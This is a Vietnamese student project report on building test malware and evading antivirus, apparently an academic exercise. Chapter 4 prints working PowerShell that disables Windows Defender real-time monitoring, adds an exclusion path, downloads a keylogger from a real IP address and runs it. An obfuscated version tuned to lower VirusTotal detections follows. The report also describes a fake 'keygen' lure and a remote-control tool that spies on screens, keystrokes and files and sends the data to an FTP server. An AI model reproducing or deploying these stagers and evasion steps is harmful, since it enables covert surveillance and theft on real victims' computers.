BỘ CÔNG THƯƠNG TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP THỰC PHẨM TP.HCM KHOA CÔNG NGHỆ THÔNG TIN BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Giảng viên hướng dẫn: Ths Trần Đắc Tốt Sinh viên thực hiện: Đỗ Minh Long – 2033181041 Nguyễn Hoàng Nam - 2033181047 TP.Hồ Chí Minh,ngày 12 tháng 10 năm 2021 BỘ CÔNG THƯƠNG TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP THỰC PHẨM TP.HCM KHOA CÔNG NGHỆ THÔNG TIN BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Giảng viên hướng dẫn: Ths Trần Đắc Tốt Sinh viên thực hiện: Đỗ Minh Long - 2033181041 Nguyễn Hồng Nam - 2033181047 TP.Hồ Chí Minh,ngày 12 tháng 10 năm 2021 LỜI CAM ĐOAN Tôi xin cam đoan cơng trình nghiên cứu riêng tơi Các số liệu, kết nêu Đồ án trung thực chưa công bố cơng trình khác Tơi xin cam đoan giúp đỡ cho việc thực Đồ án cảm ơn thơng tin trích dẫn Đồ án rõ nguồn gốc Sinh viên thực Đồ án (Ký ghi rõ họ tên) Đỗ Minh Long Trang i LỜI CÁM ƠN Trước tiên, chúng em xin gửi lời cảm ơn biết ơn sâu sắc đến Thầy Trần Đắc Tốt, Giảng viên hướng dẫn chúng em thực đề tài Thầy tận tình bảo, giúp đỡ nhóm suốt thời gian thực người giúp nhóm đưa ý tưởng, kiểm tra phù hợp đề tài Nhóm xin gửi lời cảm ơn đến tồn thể thầy trường ĐH Cơng Nghiệp Thực Phẩm TP.HCM giảng dạy tạo điều kiện cho em trình học tập nghiên cứu trường Cuối cùng, em xin cảm ơn gia đình, bạn bè, người thân bên để động viên nguồn cổ vũ lớn lao, động lực giúp em hoàn thành đề tài Mặc dù cố gắng hoàn thành đề tài phạm vi khả Tuy nhiên khơng tránh khỏi thiếu sót Em mong nhận cảm thơng tận tình bảo qúy thầy tồn thể bạn Xin chân thành cảm ơn! Sinh viên thực Đồ án (Ký ghi rõ họ tên) Đỗ Minh Long Trang ii TÓM TẮT Ngày nay, việc phát triển nhanh chóng, vượt bậc ngành cơng nghệ thơng tin nói riêng mạng internet nói chung chạm đến ngóc ngách đời sống xã hội, dần trở thành phận quan trọng quốc gia Nhưng đặt thách thức to lớn vấn đề đảm bảo an tồn an ninh thơng tin vơ to lớn Nó khơng gây nguy đe dọa nghiêm trọng đến lĩnh vực kinh tế, mà gây mối đe dọa lĩnh vực an ninh quốc phịng, an ninh quốc gia Hình thức cơng có chủ đích APT sử dụng mã độc tàng hình thực bùng phát năm 2020 Cụ thể, theo thống kê từ hệ thống Bkav, 800.000 máy tính Việt Nam bị nhiễm loại mã độc năm 2020, tăng gấp đôi so với năm 2019 Mã độc tàng hình Fileless loại mã độc đặc biệt, khơng có file nhị phân ổ cứng máy tính loại mã độc thông thường Nhận thấy tinh vi mức độ nguy hiểm mã độc nên mục đích đồ án nhằm nghiên cứu loại mã độc cách thức mà chúng hoạt động hệ thống chúng vượt mặt hệ thống Antivirus Đồng thời, thiết kế xây dựng thử nghiệm mã độc với chức năng: monitor hình, theo dõi chuột, bàn phím kỹ thuật vượt mặt hệ thống Antivirus Trang iii NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN Nhóm sinh viên gồm : Đỗ Minh Long MSSV: 2033181041 Nguyễn Hoàng Nam MSSV: 2033181047 Nhận xét : Ngày ……….tháng ………….năm 2021 ( ký tên, ghi rõ họ tên) Trang iv NHẬN XÉT CỦA GIÁO VIÊN PHẢN BIỆN Nhóm sinh viên gồm : Đỗ Minh Long MSSV: 2033181041 Nguyễn Hoàng Nam MSSV: 2033181047 Nhận xét : Ngày ……….tháng ………….năm 2021 ( ký tên, ghi rõ họ tên) Trang v MỤC LỤC LỜI CAM ĐOAN i LỜI CÁM ƠN ii TÓM TẮT iii CHƯƠNG TỔNG QUAN VỀ MÃ ĐỘC 1.1 Mã độc 1.2 Phân loại 1.3 Mục đích tầm nguy hiểm mã độc 1.4 Quy ước đặt tên cho mã độc CHƯƠNG CƠ CHẾ HOẠT ĐỘNG CỦA MÃ ĐỘC 2.1 Cơ chế hoạt động mã độc 2.2 Các phương phát lây lan mã độc CHƯƠNG MỘT SỐ KỸ THUẬT VƯỢT MẶT ANTIVIRUS 12 3.1 Phần mềm Antivirus hoạt động nào? 12 3.2 Tin tặc vượt mặc Antivirus nào? 13 3.3 Kỹ thuật Obfuscation 13 3.4 Kỹ thuật Encryption 16 CHƯƠNG TRIỂN KHAI THỰC NGHIỆM MÃ ĐỘC 18 4.1 Triển khai kỹ thuật vượt mặc Antivirus 18 4.2 Triển khai mã độc 23 CHƯƠNG KẾT LUẬN 26 5.1 Đánh giá đề tài 26 5.1.1 Những công việc làm 26 5.1.2 Những hạn chế đề tài 26 5.2 Hướng phát triển đề tài 26 Tài liệu tham khảo 27 Trang vi DANH SÁCH HÌNH ẢNH Hình Mã độc Hình Virus wanacry Hình Mục đích công mã độc Hình Quy ước đặt tên cho mã độc Hình Đính kèm mã độc email Hình Quy trình lây nhiễm mã độc qua email Hình Phát tán mã độc link độc hại thông qua sms brandname 10 Hình Phát tán mã độc thơng qua thiết bị USB 11 Hình Một số phần mềm Antivirus thông dụng 12 Hình 10 Giao diện phần mềm chứa mã độc 18 Hình 11 Kết Virus Total kiểm tra trước có mã độc đính kèm 18 Hình 12 Thông tin metadata phần mềm chứa mã độc 19 Hình 13 Thơng tin metadata phần mềm độc hại sau chỉnh sửa 19 Hình 14 Kết Virustotal kiểm tra sau thay đổi thơn gtin metadata 19 Hình 15 Mã độc đính kèm phần mềm 20 Hình 16.Mã độc lưu server 20 Hình 17 Kết Virustotal kiểm tra sau thêm mã độc vào phần mềm 20 Hình 18 Mã độc đính kèm phần mềm dùng kỹ thuật Obfuscation 22 Hình 19 Kết Virustotal thực kỹ thuật Obfuscation 22 Hình 20: Mã độc ẩn giấu máy nạn nhân 23 Hình 21: FTP chứa liệu giám sát máy tính nạn nhân 23 Hình 22: Ứng dụng điều khiển mã độc 24 Hình 23: Các cấu hình cho mã độc 24 Hình 24: Theo dõi hình mục tiêu 25 Hình 25: Theo dõi hệ thống tập tin mục tiêu 25 Trang vii BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Tin tặc vượt mặc Antivirus nào? Tội phạm mạng nghĩ số kỹ thuật để chống lại phần mềm Antivirus đảm bảo phần mềm độc hại chúng tránh phần mềm Antivirus chạy hệ thống máy tính nạn nhân Một kỹ thuật liên quan đến việc packing (đóng gói mã nguồn) Encryption, điều có nghĩa chúng thiết kế tiện ích đặc biệt để packing encryption theo cách mà phần mềm Antivirus phát Thứ hai, tội phạm mạng thực đột biến mã cách trộn mã virus trojan ‘thư rác’ để thay đổi giao diện mã phần mềm 3.2 Ngồi tội phạm mạng vượt mặt phần mềm Antivirus cách chặn phần mềm Antivirus cập nhật sở liệu Virus trojan sâu mạng tìm kiếm chương trình Antivirus hoạt động hệ thống nạn nhân Sau đó, phần mềm độc hại chặn phần mềm Antivirus, làm hỏng sở liệu chương trình ngăn chặn Antivirus hoạt động Hình thức cơng phishing tin tặc thường xuyên sử dụng Tin tặc tạo email hợp pháp cho hoạt động kinh doanh bạn người dùng nhấp vào tệp đính kèm tự động tải xuống chương trình độc hại nhúng trực tiếp vào tệp an tồn Adobe PDF hay sản phẩm Microsoft Office 3.3 Kỹ thuật Obfuscation Obfuscation kỹ thuật làm cho chương trình khó hiểu Với mục đích chuyển chương trình sang phiên khác làm cho chúng không thay đổi mặt chức Ban đầu, cơng nghệ nhằm mục đích bảo vệ tài sản trí tuệ nhà phát triển phần mềm, người viết phần mềm độc hại sử dụng rộng rãi để tránh bị phát Có nghĩa là, để trốn tránh AV, phần mềm độc hại phát triển thành hệ thông qua kỹ thuật obfuscation Obfuscation đơn giản việc làm biến dạng phần mềm độc hại ngun dạng Một ví dụ đơn giản ngẫu nhiên hóa trường hợp ký tự tập lệnh PowerShell Chức giống PowerShell không quan tâm đến trường hợp ký tự, đánh lừa q trình quét dựa chữ ký đơn giản Trang 13 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Với mã máy tính, người đọc người, thiết bị tính tốn chương trình khác Obfuscation sử dụng để đánh lừa cơng cụ Antivirus chương trình khác dựa nhiều vào chữ ký số để diễn giải mã Trình biên dịch có sẵn cho ngơn ngữ Java, hệ điều hành Android iOS, tảng phát triển NET Họ tự động đảo ngược mã nguồn; obfuscation nhằm mục đích gây khó khăn cho chương trình việc dịch ngược chúng Obfuscation thay đổi nội dung mã gốc chương trình, mà làm cho phương thức phân phối cách trình bày mã trở nên khó hiểu Obfuscation khơng thay đổi cách chương trình hoạt động kết đầu Sau đoạn mã ví dụ mã JavaScript bình thường: var greeting = 'Hello World'; greeting = 10; var product = greeting * greeting; Đoạn mã tương tự dạng xáo trộn trông này: var _0x154f=['98303fgKsLC','9koptJz','1LFqeWV','13XCjYtB','6990QlzuJn','8 7260lXoUxl','2HvrLBZ','15619aDPIAh','1kfyliT','80232AOCrXj','2jZAgw Y','182593oBiMFy','1lNvUId','131791JfrpUY'];var _0x52df=function(_0x159d61,_0x12b953){_0x159d61=_0x159d610x122;var _0x154f4b=_0x154f[_0x159d61];return _0x154f4b;};(function(_0x19e682,_0x2b7215){var _0x5e377c=_0x52df;while(!![]){try{var _0x2d3a87=parseInt(_0x5e377c(0x129))*parseInt(_0x5e377c(0x123))+parseInt(_0x5e377c(0x125))*parseInt(_0x5e377c(0x12e))+parseInt(_0x5e3 77c(0x127))*-parseInt(_0x5e377c(0x126))+-parseInt(_0x5e377c(0x124))*parseInt(_0x5e377c(0x12f))+-parseInt(_0x5e377c(0x128))*parseInt(_0x5e377c(0x12b))+parseInt(_0x5e377c(0x12a))*parseInt(_0x5e3 77c(0x12d))+parseInt(_0x5e377c(0x12c))*parseInt(_0x5e377c(0x122));if(_ 0x2d3a87===_0x2b7215)break;else _0x19e682['push'](_0x19e682['shift']());}catch(_0x22c179){_0x19e682['pu sh'](_0x19e682['shift']());}}}(_0x154f,0x1918c));var greeting='Hello\x20World';greeting=0xa;var product=greeting*greeting; Trang 14 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Dưới số kỹ thuật Obfuscation phổ biến  Renaming: Trình obfuscator thay đổi phương thức tên biến Các tên bao gồm ký tự không in khơng nhìn thấy  Packing: iều nén tồn chương trình để làm cho mã khơng thể đọc  Control flow: Kiểm sốt dịng chảy Mã dịch ngược tạo để trông giống logic spaghetti, khơng có cấu trúc khó trì mã dòng suy nghĩ bị che khuất Kết từ mã khơng rõ ràng thật khó để biết điểm mã cách nhìn vào  Instruction pattern transformation: Cách tiếp cận lấy hướng dẫn phổ biến trình biên dịch tạo hoán đổi chúng để lấy hướng dẫn phức tạp hơn, phổ biến để thực hiệu điều tương tự  Dummy code insertion: Mã giả thêm vào chương trình để làm cho khó đọc thiết kế ngược, khơng ảnh hưởng đến logic kết chương trình  Metadata or unused code removal: siêu liệu loại bỏ mã không sử dụng Mã siêu liệu không sử dụng cung cấp cho người đọc thêm thơng tin chương trình, giống thích tài liệu Word, giúp họ đọc gỡ lỗi chương trình Việc xóa siêu liệu mã khơng sử dụng khiến người đọc có thơng tin chương trình mã  Opaque predicate insertion: Chèn vị ngữ đục Vị từ mã biểu thức logic sai Các vị từ đục nhánh có điều kiện - câu lệnh if-then - kết khơng thể dễ dàng xác định phân tích thống kê Việc chèn vị từ không rõ ràng giới thiệu mã không cần thiết không thực thi gây khó hiểu cho người đọc cố gắng hiểu đầu dịch ngược  Anti-debug: Chống gỡ lỗi Các kỹ sư phần mềm tin tặc hợp pháp sử dụng công cụ gỡ lỗi để kiểm tra dịng mã Với cơng cụ này, kỹ sư phần mềm phát vấn đề với mã tin tặc sử dụng chúng để thiết kế ngược mã Các chuyên gia bảo mật CNTT sử dụng công cụ chống gỡ lỗi để xác định Trang 15 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC tin tặc chạy chương trình gỡ lỗi phần cơng Tin tặc chạy cơng cụ chống gỡ lỗi để xác định công cụ gỡ lỗi sử dụng để xác định thay đổi mà chúng thực mã  Anti-tamper: Chống làm giả Các công cụ phát mã bị giả mạo sửa đổi, dừng chương trình  String encryption: Mã hóa chuỗi Phương pháp sử dụng mã hóa để ẩn chuỗi tệp thực thi khôi phục giá trị chúng cần thiết để chạy chương trình Điều gây khó khăn cho việc duyệt qua chương trình tìm kiếm chuỗi cụ thể  Code transposition: Đây xếp lại quy trình nhánh mã mà khơng có ảnh hưởng rõ ràng đến hành vi 3.4 Kỹ thuật Encryption Phương pháp thứ Encryption Encryption phương pháp loại bỏ hiệu khả chống lại phần mềm Antivirus phát phần mềm độc hại thông qua Signature Thông thường kẻ công hay tác giả phần mềm độc hại sử dụng Crypter (chương trình mã hóa) để mã hóa tải trọng độc hại họ Các Crypter mã hóa tệp tin đính kèm ‘Stub’, có chương trình Decrypter giải mã nội dung sau thực thi chúng Một cách tiếp cận vượt qua AV dựa chữ ký sử dụng Encryption.Theo cách tiếp cận này, phần mềm độc hại mã hóa thường bao gồm giải mã phần trọng tải mã hóa Bộ giải mã khơi phục phần trọng tải bị mã hóa file bị nhiễm thực thi Đối với lần lây nhiễm, cách sử dụng khóa khác nhau, phần mềm độc hại làm cho phần mã hóa trở thành nhất, ẩn chữ ký Tuy nhiên, vấn đề phương pháp giải mã không đổi từ hệ sang hệ khác Điều giúp AV phát loại phần mềm độc hại dựa mẫu giải mã có sẵn int main( void ) { decryptCodeSection(); // Decrypt the code startShellCode(); // Call the shellcode in decrypted code return 0; } Trang 16 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Có loại chương trình Crypter:  Scantime: chương trình đơn giản đơn giản giải mã payload, sau đưa xuống ổ đĩa để thực thi  Runtime: chương trình dùng kỹ thuật để injection process khác để giải mã đoạn payload độc hại thực thi memory – RAM mà khơng cần đụng chạm đến đĩa cứng Một phương pháp Injection process phổ biến sử dụng chương trình thời gian chạy “Process Hollowing” Đầu tiên tạo tiến trình trạng thái bị treo cách sử dụng tệp thực thi hoàn toàn hợp pháp explorer.exe Sau đó, “làm rỗng” process cách giải phóng nhớ process hợp pháp thay payload độc hại trước tiếp tục tiến trình Trang 17 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC CHƯƠNG TRIỂN KHAI THỰC NGHIỆM MÃ ĐỘC Triển khai kỹ thuật vượt mặc Antivirus Ý tưởng ban đầu để đánh lừa người dùng thực thi đoạn mã độc ẩn chương trình, tạm gọi chương trình keygen Giao diện chương trình có dạng sau: 4.1 Hình 10 Giao diện phần mềm chứa mã độc Chức phần mềm lấy quyền Adminstrator từ người dùng, sau thực thi mã độc đính kèm theo chương trình Trước thực kỹ thuật bypass Antivirus, nhóm kiểm tra xem phần mềm có bị phần mềm Antivirus phát hay khơng? Để kiểm tra nhóm sử dụng trang web https://www.virustotal.com/gui/ - công cụ kiểm tra online miễn phí, tham gia nhiều phần mềm Antivirus khác Hình 11 Kết Virus Total kiểm tra trước có mã độc đính kèm Trang 18 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Mặc dù phần mềm chưa đính kèm mã độc Virustotal cho kết 15/68 phần mềm Antivirus phát chương trình độc hại Có thể Antivirus phát nhầm khơng? Khơng – phần mềm chưa đính kèm mã độc nên phần mềm Antivirus hoạt động theo chế Heuristic không phát phần mềm độc hại Nhưng cịn chế Signature, tìm kiếm thơng tin chuỗi liệu chương trình, thơng tin liên quan đến metadata Hình 12 Thông tin metadata phần mềm chứa mã độc Dựa vào thơng tin metadata ta dễ dàng nhận định mà phần mềm độc hại Các phần mềm Antivirus hoạt động theo chế Signature Để xác định lại có phải thông tin mà phần mềm Antivirus trang Virustotal đưa kết khơng, nhóm thay đổi thơng tin metadata kiểm tra lại lần trang Virustotal Hình 13 Thơng tin metadata phần mềm độc hại sau chỉnh sửa Hình 14 Kết Virustotal kiểm tra sau thay đổi thôn gtin metadata Trang 19 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Nhằm làm khó cho người phân tích mã độc họ dịch ngược phần mềm độc hại tìm thay đổi hệ thống, nhóm định khơng lưu mã độc chương trình Thay vào đó, mã độc đính kèm phần mềm có nhiệm vụ tải phần mềm độc hại Keylogger.exe lưu server, đoạn mã độc tải thực thi memory iex((New-Object System.Net.WebClient).DownloaString(\"http://103.69.193.23/Document.doc")) Hình 15 Mã độc đính kèm phần mềm ("{4}{3}{1}{2}{0}"-f'Preference','t-M','p','e','S')DisableRealtimeMonitoring ${T`RuE}&("{1}{0}{2}{3}"-f'tMp','Se','Prefer','ence')-ExclusionPath ("$env:APPDATA\Active"+'W'+'indow'+'s')(&("{0}{1}{2}"-f'New-O','bje','ct') ("{0}{1}{4}{3}{2}"-f'Sys','t','ent','ebCli','em.Net.W')).("{2}{0}{3}{1}"-f 'wnloa','File','Do','d').Invoke(("{8}{3}{2}{5}{4}{6}{0}{7}{1}"f'gger.e','e','0','1','9','3.6','.193.23/KeyLo','x','http://'),("$env:APPDA TA\Active"+('Windows'+'hAdActiv'+'e'+'.'+'e'+'xe').("{0}{1}"f'rEplAc','e').Invoke('hAd','\'))).("{2}{0}{1}{3}"-f'rt','','Sta','Process') (("$env:APPDATA\Active"+(('Window'+'s3Q'+'l'+'Acti'+'ve.exe')-replACe '3Ql',[ChAr]92))) Hình 16.Mã độc lưu server Sau thêm đoạn mã độc vào phần mềm vào kiểm tra lại với trang Virustotal có kết sau: Hình 17 Kết Virustotal kiểm tra sau thêm mã độc vào phần mềm Trang 20 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Từ kết ta thấy rõ phần mềm Antivirtus thơng dụng phát phần mềm độc hại Nguyên nhân từ đoạn mã độc vừa thêm vào Để làm cho kết từ trang Virustotal cho kết thấp có thể, nhóm sử dụng kỹ thuật Obfuscation đề cập trước để bypass chương trình Antivirus Sau thực kỹ thuật Obfuscation , quan sát lại đoạn mã độc kết sau thực quét trang virustotal lần cuối (-jOIN [System.Text.RegularExpressions.Regex]::MatChES(\" ) )93]RAHC[,)18]RAHC[+65]RAHC[+011]RAHC[(ecaLpErC - 43]RAHC[, 'sna' ecaLpErC 421]RAHC[,)76]RAHC[+67]RAHC[+301]RAHC[(ecaLpErC -)')Q8' + 'nQ8nnIOJ]2,11,3[eMan.)Q8n*rDM*Q8n Vg(( CLg )63]rAHC[,)47]' + 'rAHC[+75]rAHC[+79]rAHC[( eCAlpERC- 93]rAHC[,Q8ntvmQ8n eCaLPEr-421]rAHC[,)18]' + 'rAHC[+87]rAHC[+101]rAHC[(eCAlpE' + 'RC- ))Q8n1 , 3Q8n,Q8n, 361, 361,501,Q8n,Q8n , 7' + '4, 35 , 531, 36,16, 331,401 ,151, 451 ,411,541 ,011,361 ,44,35, 531,16 ,33tvm+t' + 'vm1,tvm+t' + 'vm 441,Q8n,Q8n1 ,461 , 46, 741,76 ,30Q8n,Q8n1,17,461 , 111,051, 511 ,441, 76, tvm+tvm311, 411, 561 ,201 ,601 , 021, 051, 171 ,36 , 16,451 ,tvm+tvm 661,601 ,741 ,35, 751, 611 , 011, 171 ,16, 411 ,16 ,111 , 161 , ' + '751 , ' + '26,Q' + '8' + 'n,Q8n 15,04 , 1' + '5 , 04,361 ,321 , 541,261 ,061 ,551 , 711 ,341 ,541 , 441 ,27 ,27 , 531 , 541Q8n,Q8n' + '1,541, 211, 241 ,751, 5' + '5 , 721, 541,611 , 05 ,05,221,tvm+tv' + 'm541, 441 ,141' + ' ,' + '501,261, tQ8n,Q8n51 ,55, 721,541,611 ,05,04, 15, 74 ,0t' + 'vm+tvm71Q8n,Q8ndILlEhSJ9a+]1[dilLehsJ9a (.' + ' QNe )63]RaHc[]GNIRTs[,tvmskrtvm(ECalPeR.)93]RaHc[]GNIRTs[,)08]RaHc[' + '+05]RaQ8n,Q8n,17, 501 , 16 ,301 tvm+tvm,30' + '1 , Q8n,Q8n, 65 ,751 , 151 ,04,04 ,421 ,34Q' + '8n,Q8n2M+' + ']3,1[)EQ8n,Q8n171 , 75 ,101 , 151, 16, 36 ,711 ' + ',35 ,141, Q8' + 'n,Q8n01, 121,tvm+tvm tvm+tvQ8n,Q8n311, 46,4Q8n,Q8n1, 331, 04,05,511, 101 , 541,261 , 461 ,' + '361, 541, 421, 101 ,411,' + '64tQ8n,Q8n1tvm+tvm, 4' + '11,501,011 ,361 , 44 , 04, 05, 04 ,65,04(( niOj-tv' + 'm( Q8n,Q8n 141,66tvm+tvm1 ,051, 56Q8n,Q8n, 251,16, 701,171,141,411,401 ,' + ' 051 , 271 , 761, 46 , 171Q8n,Q8nT::]tReVNoc[ ( { %ZdG)15 ,05, 441,611 ' + ', 501 , 711, 461,' + ' 441 ' + ', 141,5tvm+tvm01,261 , 65,' + '15, 04tvm+tvm, 15,151, 15tvm+tvm1 , 30tvm+tvm1,3tvm+tvm61 Q8n,Q8n ,16 ,Q8n,Q8n1 ,301, 16 ,351 ,361 , 66 , 07,7' + '5, 41tvm+tvm1' + ' , 261 , 301,621, 071,301 , 621 , 321 ,101 , 061, 611, 231 , 121,56,141 , 3Q8n,Q8n' + '51 , 421 , 1tvm+tvm6 ,461,16tvm+tvm1Q8n,Q8n, 211' + ',601,tvm+tvQ8n,Q8n , 441 , 751 , 5' + '51' + ',Q8n,' + 'Q' + '8n011 ,711 ,421 ,661 ,341, 521' + ', 06 , 17tvm+tvm, 111,661, 46 ,601 , 071 ,tQ8n,Q8n361, 351 ,071,641 ,301,511 , 75 , 151, 36 ,151 , 401,171 ,031,061 , 151 , 641 ,46 ,' + '321Q8n,Q8nm221 , 021 , 121,tvm+tvm341 , 661 ,151Q8n,Q8n11,151, 661,51' + '1 ,76 , 411,' + ' 17 ,401,26 ' + ',501Q8n,Q8n5 ,711, 151 ,' + '04 ,421, 341 ,541, 211 ,241 , 7Q8' + 'n,Q8n1 ' + 'Q8n,Q8n21 ,4tvm+tvm01 ,' + '561,721, ' + '761,661 , 15Q8n,Q8n301, 65 ,711 ,1Q8n,Q8n271,031 ,35,221, 141, 361 ,141 , tvm+tvm711, 351,tvm+tvmQ8n,Q8' + 'n,451 ,521 ,551 , 101 ,0tvm+tvm61, 441 ,651 ,07 , 131, 451 , 061,341,071,75, 221,5' + '01 ,501tvm+tvm,761, 511,361 ' + ', 421 , 201, 011 ,231 , 031 ,74 ,05 ,701 ,6' + '51 , 151,221 , 461' + ',tvm+tvm tvm+tvm361 ,46 ,66 , 501, 321, 141,201,5tvmQ8n,Q8n)tvm+tvm8, ))(GnIr' + 'tSOt._skr ((61tNIoQ8' + 'n,Q8n1,761 ' + ', 741 ,561 ,741 , 031, 16,17, 221 ,341, 711 , 021,061, 0' + '71tvm+tvm ,151 , 311,231 ,75 , 521, 0Q8n,Q8n, 071 , 501 ,461,tvm+tvm 331 ,04,45,Q8n,Q8n51 ,751 , 341 Q8n,Q8n , 541, Q8n,Q8n, 651tvm+tvm,541 ,' + '65 Trang 21 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC ,461Q8n,Q8nvm+tvm461 , 221 , 20' + '1, 16 ,56 ,271, 66 , 751 ,021,361 ,661tvm+tv' + 'm,051,07,26Q8n,Q8n,' + '721 ,tvm' + '+tvm321,tvm+tvm 601 , Q8n,Q8n)tQ8n,Q8n+tvm11 , 751 ,261,601 ,27,27 , 531, 42tvm+tvm1,221 ,tv' + 'm+tvm501 ,621,65Q8n,Q8n, 071, 521,201, 651,701 , 541 ,26 , 46 ,031,301,701tvm+tvm, 3' + '5 , Q8' + 'n,Q8nvm+tvm551tvm+tvm ,101, 501 ,261 ,Q8n,Q8n321 , 411,1tvm+tvm7,521 , 011,311 , 121 ,741 , 06 ,461,26,321 , 75,Q8' + 'n,Q8n 221 , 021, 551 ,711, Q8n,Q8n51 , 65 , 551, 501 , 461 , 321tvm+tvm ,1tvm+tvm31,361 , 331,45 , 04,15 , 74 ,031, 751,661 , 421, 411, 26 , 551, 651,141,461 , 511' + ',521 , 651 ,tvm+tvm 451,13t' + 'vm+tvm1 ,321,611, 711 , 171 , 66 , 46,Q8n,Q8n , 421, 321 , 551, 511,46 , 421 ,401 , 75 , 021 , 251 , 421, 341 , 441 , 651 , 17 ,26, 021 ,421, 2' + '6 ,321, 03Q8n,Q8n ,21Q8n,Q8nCneREfERpEs' + 'oBrevskr]gnIRtS[( ' + '( ZdG )} )]RAHC[ Sa-Q8n,Q8n6tvm+tvm, 611Q8n,Q8nvm' + '+tvm1 , 501,441, 65 ,611 , 751, 111,361 ,' + ' 361,5tvm+tvm41 ,221 ,021, 5Q8n,Q8n1, 721 ,011,' + ' 17 ,621, 011, 66, 031 ,71tvm+tvm1 ,741 , 031 , 051, 441 ,101,441Q8n,Q8n, 101,27 , 27 ,531 , 741, 6' + '5Q8n,Q8n, 7tvm+tvm51, 301, 65 , 551 tvm+tvm, 541 ,421 , 361 , 131, 321,331 , 531 ,551 ,101 , 541 , 221,tvm+Q8n,Q8nvmXtvm+]31[Q8n,Q8n761 , Q8n,' + 'Q8n41, 321 ,441, 441 ,01' + '1, 2Q8n,Q8n ' + '461, 321, 6Q8n,Q8n301 ,751Q8n,Q8n321 ,311, 061, 561,711 ,031, 541,511,411, 46, 66 , 661 ,701 , 311,251 , 311, ' + 'Q8n,Q8nHc[+77]RaHc[((ECalPeR.)421]RaHc[]GNIRTs[,)0' + '9]RaHc[+001]RaHc[+17]RaHc[((ECalPeR.)tvm)P2MP2MNIoj-P2MXPQ8n,Q8n 151 ,45Q8n,Q8ntvm+tvm651,711 ,15tvm+tvm1 , 361 ,321Q8n,Q8n , 321 ,301 , Q8n,Q8n1Q8n,Q8ntvm 421,361, 131, 22tvm+tvm1, 751, 511, 541,551, 65 ,711,15Q8n,Q8n1, 151,441,711, 3tvm+tvm01Q8n,Q8n261,061,' + ' 551,711 , 301 ' + ', 65 , ' + '611 , 751 , 111Q8n,Q8n171 ,26 , 07 ,071 ,' + ' Q8n,Q8nm231 ,761' + ',161 ,tvm+tvm 031,1' + '0Q8n,Q8n111, ' + '4tvm+tvm6,441,251Q8nfsna}13{}61{}66{}01{}36{}22{}93{}55{}81{}4{}43{}73{}96{}05{}8{}53{}3{}37{}62{}24{} 52{}11{}51{}94{}33{}7{}72{}21{}92{}06{}64{}45{}2{}14{}75{}17{}07{}26{}84{}56{}0{} 65{}32{}47{}41{}25{}23{}6{}' + '34{}91{}15{}1{}8' + '3{}12{}42{' + '}35{}16{}74{}04{}03{}44{}71{}5{}95{}02{}63{}46{}86{}82{}31{}54{}76{}27{}9{}85{sn a(((\'((()\'x\' +]31[dIllehS$+]1[DiLLEhs$ ( \" ,'.',\'rIGHttOlEFT\'))|.( $pshOME[21]+$pShome[30]+\'x\') Hình 18 Mã độc đính kèm phần mềm dùng kỹ thuật Obfuscation Hình 19 Kết Virustotal thực kỹ thuật Obfuscation Trang 22 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Triển khai mã độc Sau tiêm thành công đoạn mã độc vào hệ thống vượt qua Antivirus, đoạn mã độc thực, thi từ giám sát máy nạn nhân Mã độc ẩn khiến người dùng khó phát 4.2 Hình 20: Mã độc ẩn giấu máy nạn nhân Khi mã độc thực thi có chứng giống “keylogger”, mà giám sát chuột bàn phím hình nạn nhân Sau gửi liệu qua FTP server lưu theo cấu trúc thư mục định Hình 21: FTP chứa liệu giám sát máy tính nạn nhân Trang 23 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Ngồi cịn tiến hành kết nối tới ứng dụng thông qua môi trường mạng, ứng dụng dùng để điều khiển mã độc Cấu hình cho mã độc hoạt động theo dõi hoạt động mã độc Giám sát mã độc cịn tồn hay khơng Hình 22: Ứng dụng điều khiển mã độc Hình 23: Các cấu hình cho mã độc Một số chức giúp kẻ công theo dỏi người dùng ứng dụng điều khiển mã độc  Theo dõi hình mục tiêu Có thể theo dõi hình mục tiêu thay đổi hình mục tiêu  Theo dõi hệ thống tập tin mục tiêu Cỏ thể xem tổ chức thư mục số thơng tin tập tin máy tính mục tiêu, đồng thời tải chúng Trang 24 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Hình 24: Theo dõi hình mục tiêu Hình 25: Theo dõi hệ thống tập tin mục tiêu Trang 25 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC CHƯƠNG KẾT LUẬN 5.1 Đánh giá đề tài 5.1.1 Những công việc làm - Tìm hiểu mã độc, chức tầm nguy hiểm cách thức vận hành mã độc - Viết chương trình mã độc theo dõi máy tính từ xa có chức như: o Monitor hình o Theo dõi chuột bàn phím o Các kỹ 